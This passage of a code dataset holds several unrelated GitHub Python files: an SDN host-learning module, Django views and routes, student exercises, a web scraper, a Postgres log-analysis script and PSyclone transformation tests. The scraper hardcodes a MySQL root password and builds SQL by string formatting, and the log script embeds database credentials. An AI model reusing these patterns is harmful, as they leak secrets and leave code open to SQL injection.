last_dp_coldstart_time=None):\n \"\"\"Learn a host on a port.\"\"\"\n ofmsgs = []\n cache_port = None\n cache_age = None\n entry = vlan.cached_host(eth_src)\n refresh_rules = False\n\n # Host not cached, and no hosts expired since we cold started\n # Enable faster learning by assuming there's no previous host to delete\n if entry is None:\n if (last_dp_coldstart_time and\n (vlan.dyn_last_time_hosts_expired is None or\n vlan.dyn_last_time_hosts_expired < last_dp_coldstart_time)):\n delete_existing = False\n elif entry.port.permanent_learn:\n if entry.port != port:\n ofmsgs.extend(self.pipeline.filter_packets(\n {'eth_src': eth_src, 'in_port': port.number}))\n return (ofmsgs, entry.port, False)\n else:\n cache_age = now - entry.cache_time\n cache_port = entry.port\n\n if cache_port is not None:\n # packet was received on same member of a LAG.\n same_lag = (port.lacp and port.lacp == cache_port.lacp)\n # stacks of size > 2 will have an unknown MAC flooded towards the root,\n # and flooded down again. If we learned the MAC on a local port and\n # heard the reflected flooded copy, discard the reflection.\n local_stack_learn = (\n self.stack_root_flood_reflection and port.stack and not cache_port.stack)\n guard_time = self.cache_update_guard_time\n if cache_port == port or same_lag or local_stack_learn:\n # aggressively re-learn on LAGs, and prefer recently learned\n # locally learned hosts on a stack.\n if same_lag or local_stack_learn:\n guard_time = 2\n # recent cache update, don't do anything.\n if cache_age < guard_time:\n return (ofmsgs, cache_port, False)\n # skip delete if host didn't change ports or on same LAG.\n if cache_port == port or same_lag:\n delete_existing = False\n refresh_rules = True\n\n if port.loop_protect:\n ban_age = None\n learn_ban = False\n\n # if recently in loop protect mode and still receiving packets,\n # prolong the ban\n if port.dyn_last_ban_time:\n ban_age = now - port.dyn_last_ban_time\n if ban_age < self.cache_update_guard_time:\n learn_ban = True\n\n # if not in protect mode and we get a rapid move, enact protect mode\n if not learn_ban and entry is not None:\n if port != cache_port and cache_age < self.cache_update_guard_time:\n learn_ban = True\n port.dyn_learn_ban_count += 1\n self.logger.info('rapid move of %s from %s to %s, temp loop ban %s' % (\n eth_src, cache_port, port, port))\n\n # already, or newly in protect mode, apply the ban rules.\n if learn_ban:\n port.dyn_last_ban_time = now\n ofmsgs.append(self._temp_ban_host_learning(\n self.eth_src_table.match(in_port=port.number)))\n return (ofmsgs, cache_port, False)\n\n (src_rule_idle_timeout,\n src_rule_hard_timeout,\n dst_rule_idle_timeout) = self.learn_host_timeouts(port, eth_src)\n\n ofmsgs.extend(self.learn_host_on_vlan_port_flows(\n port, vlan, eth_src, delete_existing, refresh_rules,\n src_rule_idle_timeout, src_rule_hard_timeout,\n dst_rule_idle_timeout))\n\n return (ofmsgs, cache_port, True)\n\n def flow_timeout(self, _now, _table_id, _match):\n \"\"\"Handle a flow timed out message from dataplane.\"\"\"\n return []\n\n\nclass ValveHostFlowRemovedManager(ValveHostManager):\n \"\"\"Trigger relearning on flow removed notifications.\n\n .. note::\n\n not currently reliable.\n \"\"\"\n\n def flow_timeout(self, now, table_id, match):\n ofmsgs = []\n if table_id in (self.eth_src_table.table_id, self.eth_dst_table.table_id):\n if 'vlan_vid' in match:\n vlan = self.vlans[valve_of.devid_present(match['vlan_vid'])]\n in_port = None\n eth_src = None\n eth_dst = None\n for field, value in match.items():\n if field == 'in_port':\n in_port = value\n elif field == 'eth_src':\n eth_src = value\n elif field == 'eth_dst':\n eth_dst = value\n if eth_src and in_port:\n port = self.ports[in_port]\n ofmsgs.extend(self._src_rule_expire(vlan, port, eth_src))\n elif eth_dst:\n ofmsgs.extend(self._dst_rule_expire(now, vlan, eth_dst))\n return ofmsgs\n\n def expire_hosts_from_vlan(self, _vlan, _now):\n return []\n\n def learn_host_timeouts(self, port, eth_src):\n \"\"\"Calculate flow timeouts for learning on a port.\"\"\"\n learn_timeout = self._jitter_learn_timeout(self.learn_timeout, port, eth_src)\n\n # Disable hard_time, dst rule expires after src rule.\n src_rule_idle_timeout = learn_timeout\n src_rule_hard_timeout = 0\n dst_rule_idle_timeout = learn_timeout + self.cache_update_guard_time\n return (src_rule_idle_timeout, src_rule_hard_timeout, dst_rule_idle_timeout)\n\n def _src_rule_expire(self, vlan, port, eth_src):\n \"\"\"When a src rule expires, the host is probably inactive or active in\n receiving but not sending. We mark just mark the host as expired.\"\"\"\n ofmsgs = []\n entry = vlan.cached_host_on_port(eth_src, port)\n if entry is not None:\n vlan.expire_cache_host(eth_src)\n self.logger.info('expired src_rule for host %s' % eth_src)\n return ofmsgs\n\n def _dst_rule_expire(self, now, vlan, eth_dst):\n \"\"\"Expiring a dst rule may indicate that the host is actively sending\n traffic but not receving. If the src rule not yet expires, we reinstall\n host rules.\"\"\"\n ofmsgs = []\n entry = vlan.cached_host(eth_dst)\n if entry is not None:\n ofmsgs.extend(self.learn_host_on_vlan_ports(\n now, entry.port, vlan, eth_dst, delete_existing=False))\n self.logger.info(\n 'refreshing host %s from VLAN %u' % (eth_dst, vlan.vid))\n return ofmsgs\n","repo_name":"sdyear/faucet_mpls","sub_path":"faucet/valve_host.py","file_name":"valve_host.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"249293825","text":"import urllib.request,re\r\nurl= \"https://raw.githubusercontent.com/testdami555/python/master/README.md\"\r\nfile = urllib.request.urlopen(url)\r\ntotal = 0\r\nword = \"test\"\r\nlineascount = []\r\nfor line in file:\r\n\tlinea = line.decode('utf-8')\r\n\tcount = len(re.findall(word,linea, re.IGNORECASE))\t\r\n\tprint(linea)\r\n\tprint(count)\r\n\tlineascount.append(count)\r\n\r\nprint(lineascount)\r\nprint(\"Total: \"+ str(sum(lineascount)))","repo_name":"PaulaCarluccio/Nivel-3-Python-Curso","sub_path":"Clase 5/conteoonline.py","file_name":"conteoonline.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41393147828","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Product \nfrom .forms import ProductForm\n# Create your views here.\n\n\n#product create form view\ndef product_create_view(request):\n form=ProductForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('/')\n context={\n 'form': form\n }\n return render(request,'products/product_create.html',context)\n\n#update form view\ndef product_update_view(request,id=id):\n obj = get_object_or_404(Product,id=id)\n form = ProductForm(request.POST or None,instance=obj)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('product', obj.id)\n context={\n 'form': form\n }\n return render(request,'products/product_create.html',context)\n\n\n#form delete view\ndef product_delete_view(request,id):\n obj= get_object_or_404(Product,id=id)\n print(obj.title)\n if request.method == \"POST\":\n obj.delete()\n return redirect('/')\n context={\n 'obj':obj\n }\n return render(request,'products/product_delete.html',context)\n\n#list view\ndef product_list_view(request):\n products=Product.objects.all()\n context={\n 'products': products\n }\n return render(request,'products/product_list.html',context)\n\n\n#product detail view\ndef product_detail_view(request,id):\n product=get_object_or_404(Product,id=id)\n context={\n 'product':product\n }\n return render(request,'products/product_detail.html',context)","repo_name":"akayjoshi/product-site","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36545907594","text":"#Exercício 01\r\n\r\ndef soma(lista):\r\n soma_nums = sum(lista)\r\n return soma_nums\r\n\r\ndef quantidade(lista):\r\n qtd_nums = len(lista)\r\n return qtd_nums\r\n\r\ndef media(func,lista):\r\n soma = func(lista)\r\n media = soma/len(lista)\r\n return media \r\n\r\ndef soma_positivos(lista):\r\n lista_positivos =[\r\n positive for positive in lista if positive \r\n > 0]\r\n soma_positivos = sum(lista_positivos)\r\n return soma_positivos\r\n\r\ndef qtd_negativos(lista):\r\n lista_negativos = [\r\n negative for negative in lista \r\n if negative < 0\r\n ]\r\n qtd_negativos = len(lista_negativos)\r\n return qtd_negativos\r\n\r\ndef media_nums_pares(lista):\r\n sum_pares = 0\r\n n_pares = 0\r\n for num in lista:\r\n if num % 2 == 0:\r\n sum_pares += num \r\n n_pares += 1\r\n media_pares = sum_pares/n_pares \r\n return media_pares\r\n\r\ndef percentual_numeros_impares(lista):\r\n lista_impares = []\r\n for num_impar in lista:\r\n if num_impar % 2 != 0:\r\n lista_impares.append(num_impar)\r\n return (len(lista_impares)/len(lista)) * 100\r\n\r\n\r\nlista_nums = []\r\nwhile True:\r\n num = input(\"Digite um número inteiro:\")\r\n \r\n try:\r\n num = int(num)\r\n \r\n if num == 0:\r\n break\r\n \r\n else:\r\n lista_nums.append(num)\r\n \r\n except ValueError:\r\n continue\r\n\r\nprint(soma(lista_nums))\r\nprint(quantidade(lista_nums))\r\nprint(media(soma,lista_nums))\r\nprint(soma_positivos(lista_nums))\r\nprint(qtd_negativos(lista_nums))\r\nprint(media_nums_pares(lista_nums))\r\nprint(percentual_numeros_impares(lista_nums))\r\n\r\n#Exercício 02\r\n\r\nlista_nums_1 = []\r\n\r\nfor i in range(5):\r\n num = int(input(\"Digite um número inteiro:\"))\r\n lista_nums_1.append(num)\r\nprint(soma(lista_nums_1))\r\nprint(quantidade(lista_nums_1))\r\nprint(media(soma,lista_nums_1))\r\nprint(soma_positivos(lista_nums_1))\r\nprint(qtd_negativos(lista_nums_1))\r\nprint(media_nums_pares(lista_nums_1))\r\nprint(percentual_numeros_impares(lista_nums_1))","repo_name":"LucasZanini096/Mackenzie-Primeiro-Semestre","sub_path":"Labolatório - Algoritmos 1/Vetor_Lista/Exercicios_Extras_3.py","file_name":"Exercicios_Extras_3.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70916822500","text":"class employee:\n def __init__(self,aname,arole,acourse):\n self.name=aname\n self.role=arole\n self.course=acourse\n \n def printdetail(self):\n return f\"Name is {self.name} and Role is {self.role} and Course is {self.course}\"\n \nharry=employee(\"Dipesh\",\"Manager\",\"Python\")\nram=employee(\"Ram\",\"Project\",\"Php\")\nprint(harry.printdetail())\nprint(ram.printdetail())\n","repo_name":"dipeshgiri/pythonpractise","sub_path":"oops2.py","file_name":"oops2.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33578245793","text":"import requests\nfrom lxml import etree\nimport pymysql\nimport re\n\n\nclass GovementSpider(object):\n def __init__(self):\n self.one_url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36\"\n }\n self.db = pymysql.connect('localhost', 'root', 'Lxd05230708', 'spider', charset='utf8')\n self.cursor = self.db.cursor()\n\n # 提取二级页面链接(假链接)\n def get_false_link(self):\n html = requests.get(url=self.one_url, headers=self.headers).content.decode('utf-8', 'ignore')\n parse_html = etree.HTML(html)\n # xpath://a[@class='artitlelist']\n r_list = parse_html.xpath(\"//a[@class='artitlelist']\")\n for r in r_list:\n # 或者这么找title属性值\n # title = r.get('title')\n title = r.xpath(\"./@title\")[0]\n # 利用正则找到第一个自己需要的title里面的地址(第一个一般都是最新的)\n if re.findall(r'.*?中华人民共和国县以上行政区划代码.*?', title, re.RegexFlag.S):\n # 获取到第1个就停止即可,第1个永远是最新的链接\n two_link = 'http://www.mca.gov.cn' + r.xpath('./@href')[0]\n return two_link\n\n # 提取真是的二级页面链接(返回数据的链接)\n def get_true_link(self):\n two_false_link = self.get_false_link()\n html = requests.get(url=two_false_link, headers=self.headers).text\n pattern = re.compile(r'window.location.href=\"(.*?)\"', re.RegexFlag.S)\n real_link = pattern.findall(html)[0]\n self.get_data(real_link)\n\n # 真正提取数据函数\n def get_data(self, real_link):\n html = requests.get(url=real_link, headers=self.headers).text\n # 基本xpath: //tr[@height=\"19\"]\n parse_html = etree.HTML(html)\n tr_list = parse_html.xpath('//tr[@height=\"19\"]')\n for tr in tr_list:\n # code: ./td[2]/text()\n code = tr.xpath('./td[2]/text()')[0]\n # name: ./td[3]/text()\n name = tr.xpath('./td[3]/text()')[0]\n print(code, name)\n self.save_sql(code, name)\n\n def save_sql(self, code, name):\n self.cursor.execute(\"insert into version values(default, '%s', '%s')\" % (code, name))\n # 数据表中id要设置成 `id` INT NOT NULL AUTO_INCREMENT 和 PRIMARY KEY (`id`)\n self.db.commit()\n\n # 主函数\n def main(self):\n self.get_true_link()\n self.cursor.close()\n self.db.close()\n\n\nif __name__ == \"__main__\":\n spider = GovementSpider()\n spider.main()\n","repo_name":"pccode21/PythonLearn","sub_path":"src/spider/GovArea.py","file_name":"GovArea.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12469689478","text":"#!/usr/bin/env python3.6\n\"\"\"Log Analysis project\"\"\"\n\nimport psycopg2\n\ntry:\n connection = psycopg2.connect(user=\"postgres\", password=\"postgres\",\n host=\"127.0.0.1\",\n port=\"5432\", database=\"news\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT version();\")\n record = cursor.fetchone()\n print(f\"you are connected to - {record}\")\n select_q1 = \"\"\" SELECT title, count (*) AS views\n FROM articles\n INNER JOIN log\n ON log.path = '/article/' || articles.slug\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3 \"\"\"\n cursor.execute(select_q1)\n records_toview = cursor.fetchall()\n for title, views in records_toview:\n print(f\"\\\"{title}\\\" -- {views} views\")\n select_q2 = \"\"\" SELECT authors.name, views\n FROM authors\n JOIN (\n SELECT sub.author, views\n FROM\n (\n SELECT author, count(*) AS views\n FROM articles\n INNER JOIN log\n ON log.path = '/article/' || articles.slug\n GROUP BY author\n ORDER BY views DESC\n LIMIT 3\n ) sub\n ) sub2\n ON sub2.author=authors.id;\n \"\"\"\n cursor.execute(select_q2)\n for author, views in cursor.fetchall():\n print(f\"{author} -- {views} views\")\n # Just test database log\n select_q3 = \"\"\" SELECT count(status) from log ; \"\"\"\n cursor.execute(select_q3)\n count_res = int(cursor.fetchall()[0][0])\n select_q3_h = \"\"\" SELECT TO_CHAR(log.time :: DATE, 'Mon dd, yyyy')\n as date, log.status, Count(*) FROM\n log GROUP BY date, log.status \"\"\"\n cursor.execute(select_q3_h)\n records = cursor.fetchall()\n for i in range(0, len(records), 2):\n val = round(float(int(records[i+1][-1]) /\n (1.000 * (int(records[i][-1]) +\n int(records[i+1][-1])))), 3)\n if val > 0.01:\n val *= 100\n print(f'{records[i][0]} -- {val}% errors')\n\nexcept (Exception, psycopg2.Error) as error:\n print(error)\nfinally:\n # closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n print(\"connection closed !\")\n","repo_name":"sananand007/FullStack","sub_path":"logAnalysis.py","file_name":"logAnalysis.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70602356900","text":"#!usr/bin/env python\r\n# *- coding:utf-8 -*-\r\n# Author: Andy\r\nfrom django.conf.urls import url\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n url(r'home', home, name='home'),\r\n\r\n url(r'server/list/$', server, name='server'),\r\n url(r'server/edit/(?P\\d+)/$', server_edit, name='server_edit'),\r\n url(r'server/add/$', server_add, name='server_add'),\r\n url(r'server/delete/(?P\\d+)/$', server_delete, name='server_delete'),\r\n\r\n url(r'rsa/list/$', rsa, name='rsa'),\r\n url(r'rsa/add/$', rsa_add, name='rsa_add'),\r\n url(r'rsa/delete/(?P\\d+)/$', rsa_delete, name='rsa_delete'),\r\n url(r'rsa/edit/(?P\\d+)/$', rsa_edit, name='rsa_edit'),\r\n\r\n url(r'project/list/$', project, name='project'),\r\n url(r'project/add/$', project_add, name='project_add'),\r\n url(r'project/delete/(?P\\d+)/$', project_delete, name='project_delete'),\r\n url(r'project/edit/(?P\\d+)/$', project_edit, name='project_edit'),\r\n\r\n url(r'project/env/list/$', project_env, name='project_env'),\r\n url(r'project/env/delete/(?P\\d+)/$', project_env_delete, name='project_env_delete'),\r\n url(r'project/env/edit/(?P\\d+)/$', project_env_edit, name='project_env_edit'),\r\n url(r'project/env/add/$', project_env_add, name='project_env_add'),\r\n\r\n url(r'deploy/task/list/(?P\\d+)/$', deploy_task, name='deploy_task'),\r\n url(r'deploy/task/add/(?P\\d+)$', deploy_task_add, name='deploy_task_add'),\r\n url(r'deploy/task/edit/(?P\\d+)$', deploy_task_edit, name='deploy_task_edit'),\r\n url(r'deploy/task/delete/(?P\\d+)$', deploy_task_delete, name='deploy_task_delete'),\r\n\r\n url(r'deploy/now/(?P\\d+)/$', deploy_now, name='deploy_now'),\r\n url(r'deploy/channel/(?P\\d+)/$', deploy_by_channel, name='deploy_by_channel'),\r\n\r\n url(r'git/commits/$', git_commits, name='git_commits')\r\n]\r\n","repo_name":"Andy963/publish_code_demo","sub_path":"apps/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14228320017","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findFrequentTreeSum(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n \n freq = collections.defaultdict(int)\n \n def dfs(node):\n if not node:\n return 0\n if not node.left and not node.right:\n freq[node.val] += 1\n return node.val\n val = node.val + dfs(node.left) + dfs(node.right)\n freq[val] += 1\n return val\n \n dfs(root)\n sorted_freq = sorted(freq.items(), key=lambda p:p[1], reverse=True)\n return [k for k,v in sorted_freq if v == sorted_freq[0][1]]\n","repo_name":"JinnieJJ/leetcode","sub_path":"508-Most Frequent Subtree Sum.py","file_name":"508-Most Frequent Subtree Sum.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34301616381","text":"import os\nimport pytest\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.errors import InternalError\nfrom psyclone.psyir.nodes import CodeBlock, IfBlock, Literal, Loop, Node, \\\n Reference, Schedule, Statement, ACCLoopDirective, OMPMasterDirective, \\\n OMPDoDirective, OMPLoopDirective, Routine\nfrom psyclone.psyir.symbols import DataSymbol, INTEGER_TYPE, BOOLEAN_TYPE, \\\n ImportInterface, ContainerSymbol\nfrom psyclone.psyir.tools import DependencyTools\nfrom psyclone.psyir.transformations import ProfileTrans, RegionTrans, \\\n TransformationError\nfrom psyclone.tests.utilities import get_invoke, Compile\nfrom psyclone.transformations import ACCEnterDataTrans, ACCLoopTrans, \\\n ACCParallelTrans, OMPLoopTrans, OMPParallelLoopTrans, OMPParallelTrans, \\\n OMPSingleTrans, OMPMasterTrans, OMPTaskloopTrans, OMPDeclareTargetTrans\nfrom psyclone.parse.algorithm import parse\nfrom psyclone.psyGen import PSyFactory\n\nGOCEAN_BASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n os.pardir, os.pardir, \"test_files\",\n \"gocean1p0\")\n\n\n@pytest.fixture(name=\"sample_psyir\")\ndef sample_psyir_fixture(fortran_reader):\n ''' Snippet of code converted to PSyIR to use during the tests. '''\n code = '''\n subroutine my_subroutine()\n integer, dimension(10, 10) :: A\n integer :: i\n integer :: j\n do i = 1, 10\n do j = 1, 10\n A(i, j) = 0\n end do\n end do\n do i = 1, 10\n do j = 1, 10\n A(i, j) = 0\n end do\n end do\n end subroutine\n '''\n return fortran_reader.psyir_from_source(code)\n\n\ndef test_accloop():\n ''' Generic tests for the ACCLoopTrans transformation class '''\n trans = ACCLoopTrans()\n assert trans.name == \"ACCLoopTrans\"\n assert str(trans) == \"Adds an 'OpenACC loop' directive to a loop\"\n\n cnode = Statement()\n tdir = trans._directive([cnode])\n assert isinstance(tdir, ACCLoopDirective)\n\n\ndef test_accparallel():\n ''' Generic tests for the ACCParallelTrans class '''\n acct = ACCParallelTrans()\n assert acct.name == \"ACCParallelTrans\"\n assert acct._default_present is True\n\n acct = ACCParallelTrans(default_present=False)\n assert acct.name == \"ACCParallelTrans\"\n assert acct._default_present is False\n\n with pytest.raises(TypeError) as err:\n _ = ACCParallelTrans(default_present=3)\n assert (\"The provided 'default_present' argument must be a boolean, \"\n \"but found '3'.\" in str(err.value))\n\n\ndef test_accenterdata():\n ''' Generic tests for the ACCEnterDataTrans class '''\n acct = ACCEnterDataTrans()\n assert acct.name == \"ACCEnterDataTrans\"\n assert str(acct) == \"Adds an OpenACC 'enter data' directive\"\n\n\ndef test_accenterdata_internalerr(monkeypatch):\n ''' Check that the ACCEnterDataTrans.apply() method raises an internal\n error if the validate method fails to throw out an invalid type of\n Schedule. '''\n acct = ACCEnterDataTrans()\n monkeypatch.setattr(acct, \"validate\", lambda sched, options: None)\n with pytest.raises(InternalError) as err:\n acct.apply(\"Not a schedule\")\n assert (\"validate() has not rejected an (unsupported) schedule\"\n in str(err.value))\n\n\ndef test_omptaskloop_no_collapse():\n ''' Check that the OMPTaskloopTrans.directive() method rejects\n the collapse argument '''\n trans = OMPTaskloopTrans()\n cnode = Node()\n with pytest.raises(NotImplementedError) as err:\n trans._directive(cnode, collapse=True)\n assert (\"The COLLAPSE clause is not yet supported for \"\n \"'!$omp taskloop' directives\" in str(err.value))\n\n\ndef test_omptaskloop_getters_and_setters():\n ''' Check that the OMPTaskloopTrans getters and setters\n correctly throw TransformationErrors on illegal values '''\n trans = OMPTaskloopTrans()\n with pytest.raises(TransformationError) as err:\n trans.omp_num_tasks = \"String\"\n assert \"num_tasks must be an integer or None, got str\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_num_tasks = -1\n assert \"num_tasks must be a positive integer, got -1\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = \"String\"\n assert \"grainsize must be an integer or None, got str\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = -1\n assert \"grainsize must be a positive integer, got -1\" in str(err.value)\n trans.omp_num_tasks = 32\n assert trans.omp_num_tasks == 32\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = 32\n assert (\"The grainsize and num_tasks clauses would both \"\n \"be specified for this Taskloop transformation\"\n in str(err.value))\n trans.omp_num_tasks = None\n assert trans.omp_num_tasks is None\n trans.omp_grainsize = 32\n assert trans.omp_grainsize == 32\n trans.grainsize = None\n assert trans.grainsize is None\n\n trans = OMPTaskloopTrans(num_tasks=32)\n assert trans.omp_num_tasks == 32\n trans = OMPTaskloopTrans(grainsize=32)\n assert trans.omp_grainsize == 32\n\n with pytest.raises(TransformationError) as err:\n trans = OMPTaskloopTrans(grainsize=32, num_tasks=32)\n assert (\"The grainsize and num_tasks clauses would both \"\n \"be specified for this Taskloop transformation\"\n in str(err.value))\n\n with pytest.raises(TypeError) as err:\n trans = OMPTaskloopTrans(nogroup=32)\n assert \"Expected nogroup to be a bool but got a int\" in str(err.value)\n\n\ndef test_omptaskloop_apply(monkeypatch):\n '''Check that the gen_code method in the OMPTaskloopDirective\n class generates the expected code when passing options to\n the OMPTaskloopTrans's apply method and correctly overrides the\n taskloop's inbuilt value. Use the gocean API.\n '''\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n taskloop = OMPTaskloopTrans()\n master = OMPMasterTrans()\n parallel = OMPParallelTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n # Check that the _nogroup clause isn't changed during apply\n assert taskloop._nogroup is False\n taskloop.apply(schedule.children[0], {\"nogroup\": True})\n assert taskloop._nogroup is False\n taskloop_node = schedule.children[0]\n master.apply(schedule.children[0])\n parallel.apply(schedule.children[0])\n\n code = str(psy.gen)\n\n clauses = \" nogroup\"\n assert (\n f\" !$omp parallel default(shared), private(i,j)\\n\"\n f\" !$omp master\\n\"\n f\" !$omp taskloop{clauses}\\n\"\n f\" DO\" in code)\n assert (\n \" END DO\\n\"\n \" !$omp end taskloop\\n\"\n \" !$omp end master\\n\"\n \" !$omp end parallel\" in code)\n\n assert taskloop_node.begin_string() == \"omp taskloop\"\n\n # Create a fake validate function to throw an exception\n def validate(self, options):\n raise TransformationError(\"Fake error\")\n monkeypatch.setattr(taskloop, \"validate\", validate)\n # Test that the nogroup attribute isn't permanently changed if validate\n # throws an exception\n assert taskloop._nogroup is False\n with pytest.raises(TransformationError) as excinfo:\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH,\n \"single_invoke.f90\"), api=\"gocean1.0\")\n schedule = psy.invokes.invoke_list[0].schedule\n taskloop.apply(schedule[0], {\"nogroup\": True})\n assert \"Fake error\" in str(excinfo.value)\n assert taskloop._nogroup is False\n\n\ndef test_ompdeclaretargettrans(sample_psyir, fortran_writer):\n ''' Test OMPDeclareTargetTrans works as expected.'''\n\n # Try to insert a OMPDeclareTarget on a wrong node type\n ompdeclaretargettrans = OMPDeclareTargetTrans()\n loop = sample_psyir.walk(Loop)[0]\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(loop)\n assert (\"The OMPDeclareTargetTrans must be applied to a Routine, but \"\n \"found: 'Loop'.\" in str(err.value))\n\n # Insert a OMPDeclareTarget on a Routine\n routine = sample_psyir.walk(Routine)[0]\n ompdeclaretargettrans.apply(routine)\n expected = '''\\\nsubroutine my_subroutine()\n integer, dimension(10,10) :: a\n integer :: i\n integer :: j\n\n !$omp declare target\n do i = 1, 10, 1\n'''\n assert expected in fortran_writer(sample_psyir)\n\n # If the OMPDeclareTarget directive is already there do not repeat it\n previous_num_children = len(routine.children)\n ompdeclaretargettrans.apply(routine)\n assert previous_num_children == len(routine.children)\n\n\ndef test_ompdeclaretargettrans_with_globals(sample_psyir, parser):\n ''' Test that the ompdelcaretarget is not added if there is any global\n symbol'''\n ompdeclaretargettrans = OMPDeclareTargetTrans()\n routine = sample_psyir.walk(Routine)[0]\n ref1 = sample_psyir.walk(Reference)[0]\n\n # Symbol not defined in the symbol table will be considered global\n ref1.symbol = DataSymbol(\"new_symbol\", INTEGER_TYPE)\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"Kernel 'my_subroutine' contains accesses to data (variable \"\n \"'new_symbol') that are not present in the Symbol Table(s) within \"\n \"the scope of this routine. Cannot transform such a kernel.\"\n in str(err.value))\n\n # If it is local but comes from an import it is also a global\n routine.symbol_table.add(ref1.symbol)\n ref1.symbol.interface = ImportInterface(ContainerSymbol('my_mod'))\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"The Symbol Table for kernel 'my_subroutine' contains the \"\n \"following symbol(s) with imported interface: ['new_symbol']. \"\n \"If these symbols represent data then they must first be \"\n \"converted to kernel arguments using the KernelImportsToArguments \"\n \"transformation. If the symbols represent external routines then \"\n \"PSyclone cannot currently transform this kernel for execution on \"\n \"an OpenMP target.\" in str(err.value))\n\n # If the symbol is inside a CodeBlock it is also captured\n reader = FortranStringReader('''\n subroutine mytest\n not_declared1 = not_declared1 + not_declared2\n end subroutine mytest''')\n prog = parser(reader)\n block = CodeBlock(prog.children[0].children[1].children[0].children,\n CodeBlock.Structure.EXPRESSION)\n ref1.replace_with(block)\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"Kernel 'my_subroutine' contains accesses to data (variable \"\n \"'not_declared1') that are not present in the Symbol Table(s) \"\n \"within the scope of this routine. Cannot transform such a kernel.\"\n in str(err.value))\n\n\ndef test_omplooptrans_properties():\n ''' Test that the OMPLoopTrans properties assign and return the expected\n values and raise errors when necessary. '''\n\n # Check default values\n omplooptrans = OMPLoopTrans()\n assert omplooptrans.omp_schedule == \"auto\"\n assert omplooptrans.omp_directive == \"do\"\n\n # Use setters with valid values\n omplooptrans.omp_schedule = \"dynamic,2\"\n omplooptrans.omp_directive = \"paralleldo\"\n assert omplooptrans.omp_schedule == \"dynamic,2\"\n assert omplooptrans.omp_directive == \"paralleldo\"\n\n # Setting things at the constructor also works\n omplooptrans = OMPLoopTrans(omp_schedule=\"dynamic,2\",\n omp_directive=\"loop\")\n assert omplooptrans.omp_schedule == \"dynamic,2\"\n assert omplooptrans.omp_directive == \"loop\"\n\n # Use setters with invalid values\n with pytest.raises(TypeError) as err:\n omplooptrans.omp_directive = \"invalid\"\n assert (\"The OMPLoopTrans.omp_directive property must be a str with \"\n \"the value of ['do', 'paralleldo', 'teamsdistributeparalleldo', \"\n \"'loop'] but found a 'str' with value 'invalid'.\"\n in str(err.value))\n\n with pytest.raises(TypeError) as err:\n omplooptrans.omp_schedule = 3\n assert (\"The OMPLoopTrans.omp_schedule property must be a 'str' but\"\n \" found a 'int'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"invalid\"\n assert (\"Valid OpenMP schedules are ['runtime', 'static', 'dynamic', \"\n \"'guided', 'auto', 'none'] but got 'invalid'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"auto,3\"\n assert (\"Cannot specify a chunk size when using an OpenMP schedule \"\n \"of 'auto'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"dynamic,a\"\n assert (\"Supplied OpenMP schedule 'dynamic,a' has an invalid chunk-size.\"\n in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"dynamic,\"\n assert (\"Supplied OpenMP 